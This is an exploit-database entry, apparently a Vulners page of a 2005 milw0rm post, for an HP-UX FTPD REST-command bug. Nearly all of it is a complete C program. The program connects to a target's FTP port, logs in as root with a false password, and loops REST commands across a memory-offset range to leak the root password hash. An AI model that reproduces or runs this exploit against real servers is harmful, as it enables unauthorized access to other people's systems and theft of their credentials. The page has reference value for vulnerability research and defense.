HP-UX FTPD <= 1.1.214.4 "REST" Remote Brute Force Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType

HP-UX FTPD REST bug brute force exploit by phased. Sends false login credentials and brute forces REST command to gain root access


                                                /* 
Author: phased

/str0ke
*/

#include &#60;sys/types.h&#62;
#include &#60;sys/socket.h&#62;
#include &#60;netinet/in.h&#62;
#include &#60;arpa/inet.h&#62;
#include &#60;netdb.h&#62;
#include &#60;stdio.h&#62;
#include &#60;unistd.h&#62;

int main (int argc, char *argv[]) {

  int sock, rc;
  long int i;
  struct sockaddr_in saddr;
  struct hostent *h;
  char buf[256];

  printf(&#34;DMhpux FTPd - REST bug brute forcer\n&#34;);
  printf(&#34;by phased\n&#34;);

  if(argc &#60; 2) {
    printf(&#34;usage: %s &#60;host&#62; -- simple enough?\n&#34;,argv[0]);
    exit(1);
  }
  h = gethostbyname(argv[1]);
  if(h==NULL) {
    printf(&#34;%s: unknown host &#39;%s&#39;\n&#34;,argv[0],argv[1]);
    exit(1);
  }

  saddr.sin_family = h-&#62;h_addrtype;
  memcpy((char *) &saddr.sin_addr.s_addr, h-&#62;h_addr_list[0], h-&#62;h_length);
  saddr.sin_port = htons(21);

  sock = socket(AF_INET, SOCK_STREAM, 0);
  if(sock&#60;0) {
    perror(&#34;cannot open socket &#34;);
    exit(1);
  }

  rc = connect(sock, (struct sockaddr *) &saddr, sizeof(saddr));
  if(rc&#60;0) {
    perror(&#34;cannot connect &#34;);
    exit(1);
  }

  printf(&#34;Sending false login credentials\n&#34;);
 snprintf(buf, sizeof(buf), &#34;USER root\r\n&#34;);
  printf(&#34;sending %s\n&#34;, buf);
  rc = send(sock, buf, strlen(buf), 0);
  if(rc&#60;0) {
        perror(&#34;cannot send data &#34;);
        close(sock);
        exit(0);
  }
  dorecv(sock);
	usleep(1000);
  memset(buf, 0, sizeof(buf));
  snprintf(buf, sizeof(buf), &#34;PASS foo\r\n&#34;);
  printf(&#34;sending %s\n&#34;, buf);
  rc = send(sock, buf, strlen(buf), 0);
usleep(1000);
  dorecv(sock);
  dorecv(sock);

  for(i=1073931080;i&#60;=1073945000;i = i+10) {
        snprintf(buf, sizeof(buf), &#34;REST %d\r\n&#34;, i);
        printf(&#34;sending %s\n&#34;, buf);
        send(sock, buf, strlen(buf), 0);
        dorecv(sock);
 }


return 0;

}

int dorecv(int sock) {
char buf[256];
char *check;

memset(buf, 0, sizeof(buf));
recv(sock, buf, sizeof(buf), 0);
printf(&#34;got: %s\n&#34;, buf);
check = (char *)strstr(buf, &#34;root&#34;);
if(check != NULL) {
        printf(&#34;Got root hash\n&#34;);
}

}

// milw0rm.com [2005-05-03]

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1